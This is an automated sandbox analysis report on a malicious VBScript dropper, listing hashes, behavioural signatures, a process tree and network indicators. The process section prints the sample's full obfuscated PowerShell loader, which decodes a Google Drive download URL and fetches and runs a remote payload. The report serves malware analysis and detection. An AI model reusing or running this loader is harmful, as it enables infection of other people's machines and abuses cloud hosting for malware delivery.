Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
02-05-2024 06:59
Static task
static1
Behavioral task
behavioral1
Sample
20220830_ProtecoPTE..vbs
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
20220830_ProtecoPTE..vbs
Resource
win10v2004-20240426-en
General
-
Target
20220830_ProtecoPTE..vbs
-
Size
34KB
-
MD5
928637e9b64c9425fde7ca14e03aa101
-
SHA1
337201a455c055b2d79360bfb67ba81dbe64c4b0
-
SHA256
fbbb12ff0da331f5eba7d3745ba7d2e0184e175176b316c373c461b047f7ba8e
-
SHA512
5e34714a6b051073222ef2aa8bba45b50ab020bb875ee23057ae91508043badca490542b331c2ca5699f53db283a9399228da4e430fd06b42d3ec20c2fcd4b35
-
SSDEEP
768:iE/pRPD/VQHfE5kAZ6/PEAJPPvv/P4WNHeCSwFbwv21ov3dT8IcXRQ/Ua9Sr1TjT:iupRPD/yHfakAZ6/PEAJPPX/P4WVeCSm
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 2 344 WScript.exe 5 4792 powershell.exe 8 4792 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 drive.google.com 5 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4792 powershell.exe 4792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4792 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 344 wrote to memory of 4792 344 WScript.exe 84 PID 344 wrote to memory of 4792 344 WScript.exe 84 PID 4792 wrote to memory of 1904 4792 powershell.exe 87 PID 4792 wrote to memory of 1904 4792 powershell.exe 87
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20220830_ProtecoPTE..vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Harebur = 1;$Buffo230='S';$Buffo230+='ubstrin';$Buffo230+='g';Function Drottens190($Unthwarting){$Readvertizing=$Unthwarting.Length-$Harebur;For($Marianolatrist234=5; $Marianolatrist234 -lt $Readvertizing; $Marianolatrist234+=(6)){$Erantisers30+=$Unthwarting.$Buffo230.Invoke($Marianolatrist234, $Harebur);}$Erantisers30;}function direktricens($Besparede){& ($Lovligt) ($Besparede);}$nodebladenes=Drottens190 'IngleMunimaoPedalzespeiiForswlMischlna miaTo.si/Istem5Toldf.Loeft0O,ers Hover(pussyW UdspipalaenChitcdKim eoImucawSkibss Ante MacrNc imoT Tria Freds1A.dam0Swelp.Ca.em0Ine t;H ote JuteWOmspnidetacnOverr6 Afgo4Mokke;Styrt Plebix De.a6Ombru4Melle;Labor trowrKlattv B bl:Bispe1Bek.f2Unre 1 Calc.silk.0Unris)Trous krltoGConteeF.lkecgummakOverfovm el/O,blu2Listr0Rhyth1Komme0 Subf0Uhel.1 Unpr0Rrl n1,dfor Opf,gFRe.skiDia.yrEncloeHermefNav,soB,spox Kild/R.dis1mora 2Otto 1lager.Hemi.0Autho ';$Specialprventionerne=Drottens190 'VidetUGravesTeleteSrge,r Drif-MesioAKon,egI,dvieRosa nBingotJudi ';$Bordkortet=Drottens190 'He.lihVigent Ha et calpS,ndasKnage:Re,sl/Slav./ ,roddLndstrUropoiforl vDaimyePirat. EstigAmphioTreleo Kl.rgT.tchlO tbre Dorm.Su ercIndgaoAfmrkmEndo /Windbuanticc Efte?A,mode,rritxBiblipSmreroHairhrToec,tHgene=tn,ebd MaadoPoli wAsylonSpildlDesseoBfsbiaSortedCourg&.ammeiPestedOff.c=Godb.1SpunsZ.aydri euxaw VigtwAntikEHieroW I.frTRe,ism maalCSlvskWInter_Slavolm.ntaRNicolW B,lamGenomnTjenel doptvPaask_UdligHAspirJ foraUSa,an8PrudeYOppu,-Dayfl0rese oRkkefE,houlU Afg.lbol.e4lemlsdCh.mo ';$Kontingenteringernes=Drottens190 'Slagi>.oney ';$Lovligt=Drottens190 'Ov.raiLigeve SknsxFjern ';$Valutamarkedets='Lingvistens';direktricens (Drottens190 ' KredS Ng.ee Ultrt Ma.n-,tocaCOmnivo .ndenKlovntAltngeMur,nnAfrust Sond Spare-VideoP urra Resutunst,hTyndb Gi.syTPo.td:Tuata\N.ncuSRyg,aebustel h alvRivale,siltjliebeeE hemt Flets Schc.Bil.etAnalyxBeg,utUn er Bed.-SeekiV orfaa ProllSupe uHv,rveD rke ,emat$ quodVAn.imaForfrlBeskfu Holst SubsaProklm odeaas,urrLgelikOrchieRystndE,fure Pre,t A fesOutkn;Aco.o ');direktricens (Drottens190 ' TrstiDiamaf A od borat(T feltKnalleLott.sDrifttPoind-K nflpbook aPaleotKvasehAn,ic ThrusTTena,:Knipl\ggestSUforme.orphlMannov Molme JungjRec neEstu,tFol,esVenst. Doolt .njoxCatactFasta)Dulli{grnseeFngsexdestaiSteentdepos} Tatt;Winte ');$Blufferen = Drottens190 'FrarvenonadcGalinhvagtso Afsp ,ircu%Si keaMetacpSka.tpF gbedTransaZo,sptBondeaMod s%Al sk\ Dr vBOmforrAfl.deDuopoaParensd alotOpdrtwFr daeSolideR.diodEnvia.Kasu,QGraecuProceiDomme Aadri&oedem&Disin SkraaeafskycSagsghGrundoMo bi Utjsv$ Phth ';direktricens (Drottens190 ' Reno$ Ud,kgOpklol Ca.eoVrangbN klgaAbsorlDecap: ,ranKvrissvT.ileidyse,vGlossaAfs,vlTilsteAm,norSiliki overn.einfgSy iseGrundrRegiosOks,b=Diet,( ingmcKammemKategdSubch Trema/Afterc Sko Tilfl$Mir gBBotanlCitrousubsaf PredfHankae CornrvagtheTrillnC.tba)Mukke ');direktricens (Drottens190 ' Pant$Hy,osgEndoklTvivlo FredbCeleba AndelK.ndi:ProetI .olpnAnalod v deiMoerksFeltit S.ldiRhizonBejaegDonleuEpitoi Hares cierhEmissa .isdbOliebl.udsleBreadnHydr.eJordbsDoksasPatro=Polit$KultuB ForkoL.nierIn,erdRundvk,inisoCinnarJocketudjo eReceptBesto.AndensCroonpEcophl L.rsiE cultFemin( Dias$KluntKMascuo Top,n nsoptHeldiiDr,ugn Hikkg DepreLandfn ,echt Chi,eHemadr StyriRomannBehavgIngraeOmadrr Pel.nHindreRapidsAtror) Extu ');$Bordkortet=$Indistinguishableness[0];direktricens (Drottens190 ' .und$PhysigS livlfri,to .ilgbValena arlsl Mili:UndocF C.rdoApoutrspatimOmno,y.eratl F,le=BejelNRebuieHyperwHuara- FlyvO,rdokb In,ojFodboeEpulacLer atUafhn DisabS,alvay HalvsMarketFrit,eStresmGeogr.AuditN ekspeprecltW.rkb.AccruWStdpue SticbMonopCChieflP.nnoiPir.feAnadyn T,gnt Afkl ');direktricens (Drottens190 'ophio$KultuFB ghaoDepilr He.amTawhiy TranlDiate.TraadHChefre Brn,aEmbandUnstieUopnarOverbsDumpi[skumr$ TilhSReturpAns,te.hatocIn rai PriaaKapitlZombipBlaagr N igv rlseeHypern ApattTa,lei Felto DekanCrackeParabrquercnSubpreMidde]Cupca=Nedri$Symphnmon.mo,fbjed trgneS,resbColorlNitroaAfdredTilsteBrahmn GraveArve.sSa,li ');$Perlevennens=Drottens190 'TiderF.olleoUnpatrSlummmCopepy Svedlbruds.SalteDUstaboEnekawUngnanAfholl.agouoAntelaHost,dV.rvaF t aniForpal Sag.e,horo(Unslo$SitutB.ueino OxidrUncomdSkolek ygraoKom rrProsotintere.ncoltMajor,Chess$Simild UnbuiTrstulForeilUltraeP.eudn SalgiDeme,aUndvi)Konde ';$Perlevennens=$Kvivaleringers[1]+$Perlevennens;$dillenia=$Kvivaleringers[0];direktricens (Drottens190 'Lepid$ UlcegVandslFladvoT,ktabUdreda TalllMeth :Sus.rOGlacin Un rdSelefuEmboslUnadmeArnotrgungeeP.ahnnPetitdSammeeTvrve= Strm( Gr,nTpredreIberesPre eten.ob-MultiPPres axantht Wafth u,go Asp,r$D resdArctiiUdbrnl ajpllDe moeDolomnRusgiiRatioaPreun)Dynam ');while (!$Ondulerende) {direktricens (Drottens190 'Euoua$ TikagA istl Gleno sphebBityiaCharelovert:KegleDE.eceoAnimimTacklsSundep.rritrTorpoa OverkTrichs KrusiVidersForsysK.ffee altssShant=W,nni$BrstetForeprYngleuhedgeeRekni ') ;direktricens $Perlevennens;direktricens (Drottens190 'AppenSRifletpantnaTaarnrSideotannam-FundaS acklHotele Fi ae.umpepC nvi T.dji4Dorte ');direktricens (Drottens190 'Henre$Cotregarr,elBortvo EftebSkovla Reesl Pa,l:PubliObiop nMelandTinamuSqu.dlWarisePlo srClyteeEntanncognidWoo,yenumme= lnne( TattTArkiteSu rasVa antSp,ci-suk ePJobbia Pro,tTraadhUrusp ,astu$E,obrdMukkeiRodekl hobbl,idteeGranknExauniCon,iaPlie.)Goldh ') ;direktricens (Drottens190 'Sangr$,uddegSiglolUnlitoResbebKirkeaAirh,l ants:Sauv,DExpedeImidecAndeneAabenrC.austFors,iMarkefCl,ggyComfii AcetnU.harg.dvik=Esthe$BistrgSgmlslBrodso,kinhb Drmaa ,nselI tra:QuiddNChefrePliredVidenfAsystrFrytleBretenHemogdamfi eBernes afst+Omarb+Cario%Ge.ne$MdedeIVolubnPateldGir.kiN ndesFloretstar iDystrnReunigManomuAblueiUdlggs SlothhjemsaAntirbCoronlParsleSygeknOverfe Bortsd.talsDem.n.OmbrycEskado SpeauPhiesnsavagt Yvor ') ;$Bordkortet=$Indistinguishableness[$Decertifying];}direktricens (Drottens190 ' Forr$Ada tgKnurllnongroChilob Sk,laRrligl.aale:Unr.fESupernMulade Mu,iwPapul Seqrc= Prop BdepGHeilee Sigbtgar e-BortoC orneo UdtrnRe,netMooraeTypebnbeglotSulfu Outla$C mmodFremkiPrimrl Mis,lSikkeeus.renfin,aiCitriaSkatt ');direktricens (Drottens190 ' Vej,$ EvadgLngt lKondeoKl gebTheolaTrykllHerma:j.venVPolara Pe tlFremsuSlummeG.iff Ka,ku= Sche Udskr[SogneSAand y RemasKrs,ltQua reUdkasm Cera.vae eCGenbro Und nOpbe.v ,elseTrombrBrinetTitra]stift:Genne:HjemlFTrevlrStiknoRapgrmSkuesBKappeaT rrasTiltvePokya6 Fodb4SkrueSSkrmftP.stmrBehagiScav.nInveigSport(Prol $PartyEUmaadnIgnoreIndhowWinne) Coel ');direktricens (Drottens190 'trrep$Prydsg TilblBorgeoLiljeb.acroaBurgulGenke:.luggPboom.r.orgeeSterirAabeneRetreqBndeluFor tiBesgssfrilai InkotClinieSogne Photo=Phot, Kon,t[DiagnSZoospyBiog,s.ugtutrinkneAnkremFortr.Rema TIberieHemm,x disitAbrea.KortbESnftenP acoc Hj,moPegvod AwneiSgeomnKonomgSpont]Inton: can:ExcerAJrnamS Cre,CTacksIPeerlIMusik.AntibGKol.eeShib tKdebrSTeksttTh.ocrSa.seiTilorn,ilmcgMulti( De i$DeediVPi liaLimfalAbevauH.rvae ilst) over ');direktricens (Drottens190 ' Atla$ SandgForunlHenvioInsnabAn,toanyasclSp.un:UnminTBlazeaSacroemo.erlF,ues=gu,mi$ ByplPUnsavrMudgueRenser Diare DemoqBar,ouTil.ai estis KultiBand,tAmbroeAnthr..harms.uphruStackbSammesPebertJagthrBere iUberenNefengChaly(Depre3 Nond2Strit0 Proc6 Cai 8Conc.7archa, Nrkl2 Tram7Slisk7Indfl5Grubr3Gr yh),enum ');direktricens $Tael;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Breastweed.Qui && echo $"3⤵PID:1904
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82